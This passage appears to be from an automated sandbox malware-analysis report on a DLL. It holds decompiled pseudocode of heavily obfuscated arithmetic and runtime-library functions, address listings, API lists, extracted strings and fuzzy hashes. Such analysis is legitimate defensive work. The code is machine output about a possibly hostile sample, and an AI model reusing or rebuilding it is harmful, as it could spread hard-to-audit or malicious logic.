						_t426 =  *0x6e2c5a2c; // 0x0
						if(_t426 == 0) {
							goto L40;
						} else {
							goto L38;
						}
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < "or@std@@");
				_t185 = E6E200D32();
				_t364 =  *0x6e2c5a90; // 0x280609b9
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t186 =  *0x6e2c59dc; // 0x6
				_t188 =  *0x6e2c59d8; // 0x1eb1fcd4
				_t190 =  *0x6e2c59f2 & 0x0000ffff;
				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6e2c59e6; // 0x945
				 *(_t400 - 0x14) = _t186 * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6e2c59e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6e2c59e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6E2201E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6e2c5a90 = _t364;
						if(_t364 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6e2c5a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				_t434 =  *0x6e2c5a98 - _t197; // 0x6e26e664
				if(_t434 != 0) {
					L53:
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t435 =  *0x6e2c5a9c; // 0x0
					if(_t435 != 0) {
						goto L53;
					} else {
						_t296 =  *(_t400 - 0x10);
						_t83 = _t296 + 0x11e05; // 0x11e05
						_t201 = _t83;
					}
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6e2c59e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6e2c5a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6e2c5a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6e2c59d8 = _t297;
				 *0x6e2c59dc = _t346;
				do {
					if(_t393 != ( *0x6e2c59e2 & 0x0000ffff)) {
						_t94 = _t393 + 5; // 0x1998b7f8
						_t364 = _t94 + _t297;
						_push(0);
						 *0x6e2c5a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t95 = _t393 + 0x3b; // 0x1998b82e
						_t297 = _t297 + _t95 + _t364;
						asm("adc edx, eax");
						 *0x6e2c59d8 = _t297;
						 *0x6e2c59dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6e2c59e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6e2c59e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6e2c59e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6e2c5a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6e2c59e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6e2c5a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6e2c59d0 = _t105 + _t347;
				_t213 = E6E201029(_t394);
				_t300 =  *0x6e2c5a90; // 0x280609b9
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6e2c5a00 = _t213;
				_t348 = _t300;
				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6e2c59f2 =  *0x6e2c59f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6e2c59d0 = _t371;
				_t446 =  *0x6e2c5a04 - 0x1b47; // 0x0
				if(_t446 != 0) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6e2c59e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6e2c59d8 = _t349;
					 *0x6e2c59dc =  *(_t400 - 0x14);
					_t371 =  *0x6e2c59d0; // 0xd1fe2dea
				}
				_t395 = 0x6e2c5a0e;
				do {
					if(_t300 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6e2c59e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6e2c59d0 = _t371;
				_t450 =  *0x6e2c5a02 - _t301; // 0x1999
				if(_t450 != 0) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6e2c59d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6e2c5a90 = _t117 + _t349 * 2;
				E6E1FFB4A(_t396, _t451);
				_t350 =  *0x6e2c5a00; // 0x1999d5d1
				_t303 = 0x6e2c5ac8;
				_t372 =  *0x6e2c59d8; // 0x1eb1fcd4
				do {
					_t452 = _t396 -  *0x6e2c5a18; // 0x4c
					if(_t452 != 0) {
						L80:
						_t120 = _t396 + 5; // 0x5
						 *0x6e2c59dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6e2c59d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6e2c5a00 = _t350;
					} else {
						_t453 = 0 -  *0x6e2c5a1c; // 0x0
						if(_t453 != 0) {
							goto L80;
						}
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6e2c5a18);
				_t222 =  *0x6e2c59dc; // 0x6
				_t456 = 0 - _t222;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6e2c5a58 =  *0x6e2c5a58 - _t396;
					asm("sbb [0x6e2c5a5c], eax");
					 *0x6e2c5a00 = _t354;
					asm("sbb ecx, [0x6e2c59dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6e2c59d8 = _t372;
					asm("adc ecx, eax");
					 *0x6e2c59dc = 0;
				}
				_t305 =  *0x6e2c5a90; // 0x280609b9
				_t306 =  *0x6e2c59d0; // 0xd1fe2dea
				 *0x6e2c59d0 = _t306 + 0x3d + _t372 + _t305 * 2;
				return E6E220075(1);
			}
































































































































                          0x6e201285
                          0x6e20128c
                          0x6e201291
                          0x6e201297
                          0x6e2012a2
                          0x6e2012aa
                          0x6e2012b2
                          0x6e2012b8
                          0x6e2012ba
                          0x6e2012c0
                          0x6e2012c3
                          0x6e2012c5
                          0x6e2012c8
                          0x6e2012cb
                          0x6e2012d6
                          0x6e2012da
                          0x6e2012e0
                          0x6e2012ec
                          0x6e2012f2
                          0x6e2012f9
                          0x6e2012ff
                          0x6e201302
                          0x6e201308
                          0x6e20130e
                          0x6e201310
                          0x6e201310
                          0x6e20131d
                          0x6e201320
                          0x6e201325
                          0x6e201328
                          0x6e20132b
                          0x6e20132e
                          0x00000000
                          0x6e201330
                          0x6e201334
                          0x6e201338
                          0x6e20133d
                          0x6e20133f
                          0x6e20134b
                          0x6e20134d
                          0x6e201353
                          0x6e201359
                          0x6e201361
                          0x6e201363
                          0x00000000
                          0x6e201363
                          0x6e201361
                          0x00000000
                          0x6e201366
                          0x6e201366
                          0x6e201369
                          0x6e20136c
                          0x6e201375
                          0x6e201378
                          0x6e20137e
                          0x6e201390
                          0x6e201397
                          0x6e201397
                          0x6e201399
                          0x6e20139f
                          0x6e2013a2
                          0x6e2013a4
                          0x6e201380
                          0x6e201380
                          0x6e201386
                          0x00000000
                          0x6e201388
                          0x6e201388
                          0x6e201388
                          0x6e201386
                          0x6e2013bf
                          0x6e2013c5
                          0x6e2013cb
                          0x6e2013d1
                          0x6e2013d9
                          0x6e2013e1
                          0x6e2013e6
                          0x6e2013eb
                          0x6e2013f2
                          0x6e2013f8
                          0x6e2013fb
                          0x6e201401
                          0x6e201403
                          0x00000000
                          0x6e201405
                          0x6e20140b
                          0x6e201414
                          0x6e201419
                          0x6e20141b
                          0x6e201421
                          0x6e201424
                          0x6e201426
                          0x6e201432
                          0x6e20143a
                          0x6e20143c
                          0x6e201442
                          0x00000000
                          0x6e201442
                          0x6e20143a
                          0x00000000
                          0x6e201449
                          0x6e201449
                          0x6e20144c
                          0x6e201463
                          0x6e201468
                          0x6e201473
                          0x6e20147a
                          0x6e201483
                          0x6e201489
                          0x6e20148b
                          0x6e201491
                          0x6e20149a
                          0x6e2014a3
                          0x6e2014a9
                          0x6e2014a9
                          0x6e2014b7
                          0x6e2014bc
                          0x6e2014bf
                          0x6e2014c4
                          0x6e2014c6
                          0x6e2014cb
                          0x6e2014d0
                          0x6e2014d2
                          0x6e2014d5
                          0x6e2014d8
                          0x6e2014df
                          0x6e2014e4
                          0x6e2014e7
                          0x6e2014ec
                          0x6e2014f2
                          0x6e2014f9
                          0x6e2014fa
                          0x6e201501
                          0x6e20151c
                          0x6e201526
                          0x6e201526
                          0x6e20152c
                          0x6e201503
                          0x6e20150a
                          0x6e201514
                          0x6e201514
                          0x6e201531
                          0x6e201536
                          0x6e20153b
                          0x6e201544
                          0x6e201545
                          0x6e201545
                          0x6e20154b
                          0x6e201551
                          0x6e201558
                          0x6e201578
                          0x6e20157e
                          0x6e201586
                          0x6e20158b
                          0x6e20158b
                          0x6e20158d
                          0x6e20155a
                          0x6e20155a
                          0x6e201565
                          0x6e201570
                          0x6e201570
                          0x6e201593
                          0x6e201594
                          0x6e201595
                          0x6e2015bc
                          0x6e2015c1
                          0x6e2015c7
                          0x6e2015cc
                          0x6e2015d2
                          0x6e2015d8
                          0x6e2015e1
                          0x6e2015e3
                          0x6e2015e6
                          0x6e2015e9
                          0x6e2015eb
                          0x6e2015f5
                          0x6e2015f7
                          0x6e2015fa
                          0x6e2015fa
                          0x6e2015fc
                          0x6e2015ff
                          0x6e201607
                          0x6e20160c
                          0x6e201612
                          0x6e201618
                          0x6e201620
                          0x6e201623
                          0x6e201629
                          0x6e201644
                          0x6e20164e
                          0x6e201654
                          0x6e20162b
                          0x6e20162b
                          0x6e201631
                          0x00000000
                          0x6e201633
                          0x6e201633
                          0x6e20163d
                          0x6e20163d
                          0x6e201631
                          0x6e201664
                          0x6e201667
                          0x6e20166a
                          0x6e20166f
                          0x6e201671
                          0x6e201674
                          0x6e20167b
                          0x6e20167e
                          0x6e201683
                          0x6e20168a
                          0x6e20168f
                          0x6e201695
                          0x6e20169c
                          0x6e20169d
                          0x6e2016a2
                          0x6e2016a5
                          0x6e2016aa
                          0x6e2016ac
                          0x6e2016b6
                          0x6e2016bb
                          0x6e2016bd
                          0x6e2016c0
                          0x6e2016c3
                          0x6e2016c8
                          0x6e2016cd
                          0x6e2016d4
                          0x6e2016d9
                          0x6e2016df
                          0x6e2016eb
                          0x6e2016f6
                          0x6e2016f9
                          0x6e201707
                          0x6e20170e
                          0x6e201715
                          0x6e20171a
                          0x6e201720
                          0x6e201725
                          0x6e20172e
                          0x6e201733
                          0x6e201737
                          0x6e20173e
                          0x6e201748
                          0x6e20174a
                          0x6e20174d
                          0x6e201753
                          0x6e201755
                          0x6e201758
                          0x6e20175d
                          0x6e201763
                          0x00000000
                          0x6e201765
                          0x6e201765
                          0x6e20176b
                          0x00000000
                          0x00000000
                          0x6e20176b
                          0x6e201740
                          0x6e201740
                          0x6e201746
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e201746
                          0x00000000
                          0x6e20176d
                          0x6e20176d
                          0x6e201770
                          0x6e20177a
                          0x6e20177f
                          0x6e201785
                          0x6e20178d
                          0x6e201790
                          0x6e201793
                          0x6e201799
                          0x6e2017a2
                          0x6e2017ad
                          0x6e2017b4
                          0x6e2017b7
                          0x6e2017c3
                          0x6e2017c6
                          0x6e2017cc
                          0x6e2017e9
                          0x6e2017f0
                          0x6e2017f0
                          0x6e2017f3
                          0x6e2017f6
                          0x6e2017f8
                          0x6e2017ce
                          0x6e2017d1
                          0x6e2017d9
                          0x6e2017e4
                          0x6e2017e4
                          0x6e2017fe
                          0x6e201801
                          0x6e201806
                          0x6e201809
                          0x6e20180c
                          0x6e20180f
                          0x6e201812
                          0x6e201878
                          0x00000000
                          0x6e201814
                          0x6e20181b
                          0x6e20181f
                          0x6e201824
                          0x6e201827
                          0x6e201830
                          0x6e201836
                          0x6e201838
                          0x6e201840
                          0x6e201842
                          0x00000000
                          0x6e201842
                          0x6e201840
                          0x00000000
                          0x6e201845
                          0x6e201845
                          0x6e201848
                          0x6e20184b
                          0x6e201854
                          0x6e201855
                          0x6e201858
                          0x6e20185b
                          0x6e201861
                          0x6e20187d
                          0x6e201884
                          0x6e201889
                          0x6e201889
                          0x6e20188c
                          0x6e20188e
                          0x6e201863
                          0x6e201865
                          0x6e20186b
                          0x00000000
                          0x6e20186d
                          0x6e20186d
                          0x6e201870
                          0x6e201870
                          0x6e201870
                          0x6e20186b
                          0x6e201891
                          0x6e201897
                          0x6e2018b1
                          0x6e201899
                          0x6e201899
                          0x6e2018a5
                          0x6e2018a7
                          0x6e2018ad
                          0x6e2018ad
                          0x6e2018b6
                          0x6e2018c2
                          0x6e2018c5
                          0x6e2018c7
                          0x6e2018ca
                          0x6e2018cc
                          0x6e2018d2
                          0x6e2018d8
                          0x6e2018e1
                          0x6e2018e6
                          0x6e2018e9
                          0x6e2018eb
                          0x6e2018ed
                          0x6e2018f3
                          0x6e2018f6
                          0x6e2018fb
                          0x6e2018fe
                          0x6e201900
                          0x6e201906
                          0x6e201906
                          0x6e20190f
                          0x6e201912
                          0x6e201915
                          0x6e20191c
                          0x6e20191f
                          0x6e201924
                          0x6e201927
                          0x6e20192e
                          0x6e201931
                          0x6e201931
                          0x6e201935
                          0x00000000
                          0x6e201937
                          0x6e201941
                          0x6e201944
                          0x6e201946
                          0x6e201955
                          0x6e201957
                          0x6e20195a
                          0x00000000
                          0x6e20195a
                          0x6e201955
                          0x00000000
                          0x6e201961
                          0x6e201961
                          0x6e201964
                          0x6e201967
                          0x6e20196e
                          0x6e201975
                          0x6e20197a
                          0x6e20197f
                          0x6e201985
                          0x6e201988
                          0x6e20198a
                          0x6e20198f
                          0x6e201993
                          0x6e201995
                          0x6e201998
                          0x6e20199f
                          0x6e20199f
                          0x6e2019a1
                          0x6e2019a9
                          0x6e2019ab
                          0x6e2019b1
                          0x6e2019b8
                          0x6e2019eb
                          0x6e2019ba
                          0x6e2019c4
                          0x6e2019c9
                          0x6e2019d2
                          0x6e2019d5
                          0x6e2019d7
                          0x6e2019dd
                          0x6e2019e3
                          0x6e2019e3
                          0x6e2019ee
                          0x6e2019f3
                          0x6e2019fc
                          0x6e2019fe
                          0x6e201a01
                          0x6e201a04
                          0x6e201a04
                          0x6e201a07
                          0x6e201a0a
                          0x6e201a0a
                          0x6e201a0c
                          0x6e201a0f
                          0x6e201a11
                          0x6e201a19
                          0x6e201a1e
                          0x6e201a1f
                          0x6e201a25
                          0x6e201a2c
                          0x6e201a31
                          0x6e201a31
                          0x6e201a33
                          0x6e201a33
                          0x6e201a39
                          0x6e201a41
                          0x6e201a46
                          0x6e201a4b
                          0x6e201a51
                          0x6e201a56
                          0x6e201a5c
                          0x6e201a5e
                          0x6e201a64
                          0x6e201a6e
                          0x6e201a6e
                          0x6e201a71
                          0x6e201a76
                          0x6e201a78
                          0x6e201a7a
                          0x6e201a80
                          0x6e201a86
                          0x6e201a89
                          0x6e201a8b
                          0x6e201a66
                          0x6e201a66
                          0x6e201a6c
                          0x00000000
                          0x00000000
                          0x6e201a6c
                          0x6e201a91
                          0x6e201a94
                          0x6e201a9c
                          0x6e201aa3
                          0x6e201aa5
                          0x6e201ab0
                          0x6e201ab4
                          0x6e201ab6
                          0x6e201abd
                          0x6e201ac5
                          0x6e201acf
                          0x6e201ad5
                          0x6e201ad7
                          0x6e201add
                          0x6e201adf
                          0x6e201adf
                          0x6e201ae5
                          0x6e201af0
                          0x6e201afc
                          0x6e201b07

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20128C
                          • GetSystemDirectoryA.KERNEL32 ref: 6E2013C5
                          • GetTempPathA.KERNEL32(0000056D,C:\Users\user\AppData\Local\Temp\,?,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E,?,00000001,?), ref: 6E201468
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryH_prolog3PathSystemTemp
                          • String ID: (Z,n$6265$6623$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$DZ,n$DZ,n$DZ,n$DZ,n$E$Had s$Molecul$cd Island$cd Matter m$out drop $part $Y,n$Y,n$Y,n
                          • API String ID: 3607090873-2664209548
                          • Opcode ID: 1ec597e508b1389623b27b9f2332c2d0fe6531852423472695b85293070f7f77
                          • Instruction ID: 728cb7aee2a600c8191dd4e8088b25b04de57e2a826a6255d42a11b98fbc2278
                          • Opcode Fuzzy Hash: 1ec597e508b1389623b27b9f2332c2d0fe6531852423472695b85293070f7f77
                          • Instruction Fuzzy Hash: 0132C371A8161A8FCF84CFA9C49D5AD77F3BB89B14B24456BD405DB780E730E980CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2078D3, Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E2078DA
                          • std::locale::_Init.LIBCPMT ref: 6E2078FB
                            • Part of subcall function 6E207005: __EH_prolog3.LIBCMT ref: 6E20700C
                            • Part of subcall function 6E207005: std::_Lockit::_Lockit.LIBCPMT ref: 6E207017
                            • Part of subcall function 6E207005: std::locale::_Setgloballocale.LIBCPMT ref: 6E207032
                            • Part of subcall function 6E207005: _Yarn.LIBCPMT ref: 6E207048
                            • Part of subcall function 6E207005: std::_Lockit::~_Lockit.LIBCPMT ref: 6E207088
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
                          • String ID:
                          • API String ID: 3152668004-0
                          • Opcode ID: 0ca6e57f01e111cddd69ffcb867a043a36f1cfd2428931c055d9b457b5bc4098
                          • Instruction ID: 75a7b05ee0c68bce66fa10d362e75f8cb1b0a555dd5c666b178b86233fd882a4
                          • Opcode Fuzzy Hash: 0ca6e57f01e111cddd69ffcb867a043a36f1cfd2428931c055d9b457b5bc4098
                          • Instruction Fuzzy Hash: 77E0267AA2162E5FE31167E48511FDDE2977F80B18F62051AD2009F2C0DFF45E0047C1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24F26D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 153 6e24f26d-6e24f279 154 6e24f2ab-6e24f2b6 call 6e242281 153->154 155 6e24f27b-6e24f27d 153->155 163 6e24f2b8-6e24f2ba 154->163 157 6e24f296-6e24f2a7 RtlAllocateHeap 155->157 158 6e24f27f-6e24f280 155->158 159 6e24f282-6e24f289 call 6e25beb2 157->159 160 6e24f2a9 157->160 158->157 159->154 165 6e24f28b-6e24f294 call 6e249256 159->165 160->163 165->154 165->157
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 50c7140369a00c0af24c527298b173aa4f97eda55cf677bd71ab1aa88266d8e3
                          • Instruction ID: d08f9745354f46918723af8160d69c7cec27c41a0155eabfe6afdc87fe1b7d67
                          • Opcode Fuzzy Hash: 50c7140369a00c0af24c527298b173aa4f97eda55cf677bd71ab1aa88266d8e3
                          • Instruction Fuzzy Hash: EDE0302A64062BDBF79996E6D814B8B7B9BAFC27A2B2516109D35971C0CB20C900C1A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 6E25E6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E6E25E6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6e2c506c; // 0x22cbda9b
				_v8 = _t39 ^ _t107;
				_t3 =  &_a12; // 0x6e24e03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6E24D5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6E24D5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6e24e03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6e272f04; // 0x17
					E6E25E68F(0, " )'nU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6e24e03b
					E6E25E00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6e24e03b
						E6E25E112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6e24e03b
						E6E25E077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6e272dec; // 0x41
						_t77 = E6E25E68F(_t99, "t!\'nE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6E25E518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6E2545D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6E21F8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6E2545D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6E265124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6E25E112(_t92, _t99,  &_v20);
						} else {
							E6E25E077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}



































                          0x6e25e6f4
                          0x6e25e6fb
                          0x6e25e702
                          0x6e25e702
                          0x6e25e706
                          0x6e25e70a
                          0x6e25e718
                          0x6e25e71d
                          0x6e25e71e
                          0x6e25e71f
                          0x6e25e720
                          0x6e25e725
                          0x6e25e728
                          0x6e25e72a
                          0x6e25e730
                          0x6e25e736
                          0x6e25e739
                          0x6e25e73b
                          0x6e25e73e
                          0x6e25e742
                          0x6e25e749
                          0x6e25e756
                          0x6e25e75b
                          0x6e25e75e
                          0x6e25e761
                          0x6e25e761
                          0x6e25e763
                          0x6e25e766
                          0x6e25e76a
                          0x6e25e7da
                          0x6e25e7dc
                          0x6e25e7de
                          0x6e25e7f1
                          0x6e25e7f1
                          0x6e25e7f8
                          0x6e25e7fe
                          0x6e25e801
                          0x00000000
                          0x6e25e801
                          0x6e25e7e0
                          0x6e25e7e3
                          0x00000000
                          0x00000000
                          0x6e25e7e5
                          0x6e25e7e9
                          0x6e25e7ee
